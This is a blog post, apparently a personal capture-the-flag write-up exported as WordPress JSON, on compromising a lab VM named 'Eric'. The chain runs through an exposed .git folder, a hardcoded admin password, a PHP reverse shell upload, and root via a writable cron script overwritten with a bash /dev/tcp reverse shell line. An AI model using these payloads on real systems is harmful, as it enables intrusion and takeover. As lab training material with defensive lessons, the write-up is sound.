{"id":192,"date":"2025-05-20T12:39:00","date_gmt":"2025-05-20T12:39:00","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=192"},"modified":"2025-05-13T12:40:36","modified_gmt":"2025-05-13T12:40:36","slug":"vm-eric","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=192","title":{"rendered":"VM: Eric"},"content":{"rendered":"\n

The misses was away from home, so I got some extra time for a CTF to work on. Time to dig in and sharpen some skills.<\/p>\n\n\n\n

\ud83d\udd0d Reconnaissance<\/h2>\n\n\n\n

As always, I kicked things off with an nmap<\/code> scan to see what services were running:<\/p>\n\n\n\n

$ nmap -sC -sV -T4 -p- <target><\/code><\/pre>\n\n\n\n
I found SSH (port 22) and HTTP (port 80). Browsing to the site revealed a basic blog page under construction. Looked like a good target for some classic web recon. After a basic Nikto scan we find two interesting things:<\/p>\n\n\n\n
\/admin.php<\/code> <\/p>\n\n\n\n
.git<\/code> folder <\/p>\n\n\n\n
I first went for the obvious: the admin panel. Thought I might be able to pull off a quick SQL injection. Sadly, no dice \u2014 the app showed an error that seemed<\/em> like a classic “red herring.” Just to be sure, I ran sqlmap<\/code> and even hydra<\/code> for brute-forcing \u2014 but nothing useful came up.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Then I remembered something I\u2019d read recently: if .git<\/code> is exposed, you can sometimes reconstruct the entire source using a tool like git-dumper<\/a> <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
It worked. I now had access to the raw source code, including admin.php<\/code>. And guess what? Inside it was a hardcoded password.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\ud83e\udde8 Exploitation<\/h2>\n\n\n\n
Using the password, I logged into the admin panel. From there, I noticed a file upload feature. The code even had a developer comment:<\/p>\n\n\n\n
\n
\/\/ todo: Make sure it is only allowed to upload images<\/p>\n<\/blockquote>\n\n\n\n
So I uploaded my standard reverse_shell.php<\/code>. The upload directory was visible in the code, so I navigated to the file, and… I had a reverse shell as www-data<\/code><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Next step: grab the user flag. The challenge description pointed me to \/home\/eric\/flag.txt<\/code>. Easy find.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\ud83d\udd10 Privilege Escalation<\/h2>\n\n\n\n
First, I checked backup.sh<\/code> in the home directory \u2014 nothing stood out at first glance. Since the nmap<\/code> scan showed SSH was open, I searched the server for private keys, but all of them were encrypted \u2014 dead end. I went back to enumerating and started reviewing cron<\/code> jobs. Turned out the backup.sh<\/code> script runs every 5 minutes \u2014 as root. Even better: the script file was writable by me. Perfect spot for privilege escalation.<\/p>\n\n\n\n
I replaced its contents with a reverse shell payload:<\/p>\n\n\n\n
$ echo \"bash -i >& \/dev\/tcp\/<jouw_ip>\/4444 0>&1\" > backup.sh<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Set up my listener, waited a few minutes\u2026 and root shell.<\/p>\n\n\n\n
\ud83d\udcd8 Lessons Learned<\/h2>\n\n\n\n
\u2705 .git<\/code> directories can leak full source code \u2014 don\u2019t leave them exposed<\/p>\n\n\n\n
\u2705 Always inspect cron<\/code> jobs \u2014 especially if they run as root<\/p>\n\n\n\n
\u2705 File permissions matter \u2014 if users can write to a root-owned script, that\u2019s game over<\/p>\n\n\n\n
\u2705 Post-exploitation stability matters \u2014 reverse shells can be fragile if they depend on one-time uploads or unstable sessions<\/p>\n\n\n\n
This box was a solid reminder that a small misconfiguration \u2014 like an exposed .git<\/code> folder or writable cron<\/code> script \u2014 can be all it takes to pivot to full compromise. The challenge also reinforced the value of enumeration and thinking outside the default attack patterns when the obvious path doesn\u2019t work.<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
The misses was away from home, so I got some extra time for a CTF to work on. Time to dig in and sharpen some skills. \ud83d\udd0d Reconnaissance As always, I kicked things off with an nmap scan to see what services were running: I found SSH (port 22) and HTTP (port 80). Browsing to […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[26,24,19],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-ctf-2","tag-git","tag-lfi"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=192"}],"version-history":[{"count":8,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":208,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/192\/revisions\/208"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}